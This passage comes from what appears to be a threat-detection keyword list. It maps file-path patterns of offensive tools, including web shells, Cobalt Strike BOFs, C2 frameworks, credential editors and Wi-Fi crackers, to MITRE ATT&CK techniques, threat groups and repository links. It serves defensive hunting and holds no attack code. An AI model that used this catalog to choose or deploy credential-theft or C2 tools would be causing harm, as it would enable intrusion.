- T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/vss-enum.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/vssenum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*/vtam-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vulners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vulnscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/vulnserver.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*/vulscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/vuze-dht-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/waf__enum/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/wapitiCore/*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/wapiti-scanner/*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/Watson.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/wce32.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*/wce64.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*/wce-beta.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*/wdb-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*/wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*/WDExtract.git*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*/wdextract32.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*/wdextract64.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*/WdToggle.c*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*/WdToggle.h*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*/weakpass.git*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*/Web/decouverte.txt*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/Web/discovery.txt*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/web/pwn.html*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*/web_rce.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/WebC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/WebDavC2.git*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*/web-hacking-toolkit*,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,1,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z -*/weblistener.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*/weblogic-t3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/webshell.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/webshell/*.aspx*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*/webshell/*.jsp*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*/webshell/*.php*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*/webshells/shell.aspx*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/webshells/shell.php*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/WebSocketC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/Weevely*,offensive_tool_keyword,weevely,weevely php web shell,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/sunge/Weevely,1,0,N/A,N/A,1,41,113,2012-04-19T18:00:08Z,2012-05-04T13:17:42Z -*/Weevely3*,offensive_tool_keyword,Weevely3,Webponized web shell,T1100 - T1102 - T1059 - T1071 - T1056,TA0002 - TA0003,N/A,N/A,Web Attacks,https://github.com/epinna/weevely3,1,0,N/A,N/A,10,2908,607,2023-06-21T14:41:31Z,2014-09-20T10:16:49Z -*/well_known_sids.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*/WerTrigger.git*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z -*/WfpTokenDup.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*/whatlicense.git*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*/WheresMyImplant/*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/WhoAmI.task*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/whois-domain.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/whois-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Widgets/LootWidget.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/wifi_hopping.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/WiFiBroot*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*/wifidump.c*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/wifite -c *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*/wifite2*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*/wikipedia_fr.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/wikiZ/RedGuard*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 